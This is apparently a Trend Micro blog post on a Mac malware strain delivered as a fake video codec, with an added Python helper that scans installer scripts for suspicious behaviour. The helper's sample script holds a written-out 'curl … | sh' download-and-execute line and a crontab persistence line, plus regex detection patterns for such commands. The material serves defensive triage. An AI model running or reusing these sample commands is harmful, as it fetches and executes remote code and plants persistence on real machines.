Apple’s suggestion to Mac users to install antivirus programs on their systems has been creating buzz in the online community. This is despite the fact that Apple initially pushed the same notion six years ago, and echoed the same concern last year.

The matter surprised those who heard of the news only recently, especially since Apple claims in its advertisements that Mac users need not worry about malicious software. Some users took the announcement as an admission by Apple that the Mac is also susceptible to malware attacks. The issue grew further after the antivirus suggestion post was deleted from the Apple website.

Though Apple’s motives for its actions are still unclear, one thing is certain: everyone needs protection from threats. As Trend Micro Advanced Threats Researcher Jamz Yaneza puts it,

The reality is that any growing market segment is a target for criminals and boy can they pick ’em. Apple Macs are expensive and having one puts users in a certain cash-plenty demographic ripe for spear phishing.

Yaneza further states that the existence of Mac-related threats isn’t surprising at all. He says:

Threats on the Apple Mac [are] nothing new. Do not be deceived, [it’s] just another example of the old becoming new again.

Ironically, had they not retracted their previous statement, Apple’s concern for the security of its users’ systems would have been perfectly timed with a recently reported web threat that targets Mac users. The malware, detected as OSX_JAHLAV.A, is reported to arrive via spammed messages and is also said to be distributed through websites while posing as an application. Links in the spammed message lead to a site that supposedly hosts a video the user must watch.

Upon trying to play the video, however, the user is greeted with a dialog box asking them to download a “codec” in order to view it. Once the user chooses to download the alleged codec, the file cold-live7000.dmg is downloaded to the affected system instead. DMG files such as cold-live7000.dmg are disk image files, quite similar to ISO files: they are copies of an entire disk placed into a single file, and they have to be mounted before the data inside can be extracted.

In this case, cold-live7000.dmg was found to contain an installer package file named install.pkg.

Figure 1. Contents of the disk image file

This installer package contains the shell script files preinstall and preupgrade. The two files have essentially the same content, and Trend Micro detects both as UNIX_JAHLAV.A. UNIX_JAHLAV.A is a shell script malware designed to run on Mac OS X that causes the system to connect to a certain IP address every five hours.

Figure 2. Script files preinstall and preupgrade

Executing install.pkg displays the following window:

Figure 3. Install prompt displayed when executing the installer package

The installer name MacAccess is apparently just one of the names this threat goes by. Its reported previous names are MacVideo and Porn4Mac.

Figure 4. Malware installation taking place

During installation, it tries to connect via HTTP to the IP address {BLOCKED}.{BLOCKED}.60.106 to download and execute an additional component. Unfortunately, the IP address is inaccessible as of this writing.
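The chain described above (installer scripts that fetch a component over HTTP from a bare IP address, run it, and arrange a periodic callback) is exactly what a triage pass over a suspicious .pkg should surface. The Python helper below is an added example, not Trend Micro’s tooling: it scans the text of scripts taken from a package’s Scripts directory (for instance after expanding it with `pkgutil --expand`), and the sample preinstall script it ships with is constructed to mimic the behaviour the post describes, not the real JAHLAV script.

```python
import re

# Patterns for the behaviours the post attributes to the installer scripts: an HTTP fetch
# from a bare IP address, execution of what was fetched, and a recurring callback job.
IP_URL     = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?[^\s'\"]*")
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SH = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b")
CRON_WRITE = re.compile(r"\bcrontab\b")
LAUNCHD    = re.compile(r"\blaunchctl\s+load\b|LaunchDaemons|LaunchAgents")

def triage_script(text):
    """Return (line_no, tag, line) findings for the text of one installer script."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):   # skip blanks and comments
            continue
        if FETCH_TOOL.search(line) and IP_URL.search(line):
            findings.append((no, "fetch-from-ip", stripped))
        if FETCH_TOOL.search(line) and PIPE_TO_SH.search(line):
            findings.append((no, "download-and-execute", stripped))
        if CRON_WRITE.search(line):
            findings.append((no, "cron-persistence", stripped))
        if LAUNCHD.search(line):
            findings.append((no, "launchd-persistence", stripped))
    return findings

def triage_package_scripts(scripts):
    """scripts: {name: text} read from an expanded pkg's Scripts directory."""
    result = {}
    for name, text in scripts.items():
        findings = triage_script(text)
        if findings:                    # report only scripts that raised a finding
            result[name] = findings
    return result

# Constructed sample scripts modelled on the behaviour described in the post; this is
# NOT the real JAHLAV script. The IP is a documentation address (RFC 5737).
SAMPLE_PREINSTALL = """#!/bin/sh
# comment mentioning http://203.0.113.10/ is ignored by the scanner
curl -s http://203.0.113.10/component | sh
(crontab -l 2>/dev/null; echo '0 */5 * * * /tmp/component') | crontab -
"""
SAMPLE_SCRIPTS = {
    "preinstall": SAMPLE_PREINSTALL,
    "preupgrade": SAMPLE_PREINSTALL,       # the post notes both files share content
    "postinstall": "#!/bin/sh\nexit 0\n",  # benign script, yields no findings
}
```

Feed it the script bodies of a package you are examining; each finding carries the script name, the line number and a tag, so the fetch, execute and persistence steps can be reviewed line by line.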

Windows may be more targeted than the Mac, but users must realize that regardless of the operating system in use, every system connected to the Internet is bound to encounter some kind of threat, which calls for security measures.

Here are some of the recent Mac-related threats we’ve seen:

  • Rogue App Sweeps Mac
  • Scareware software makes its second round on Mac O/S
  • Backdoor Busts the Mac Myth
  • New Malware Threatens Mac Users



© Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice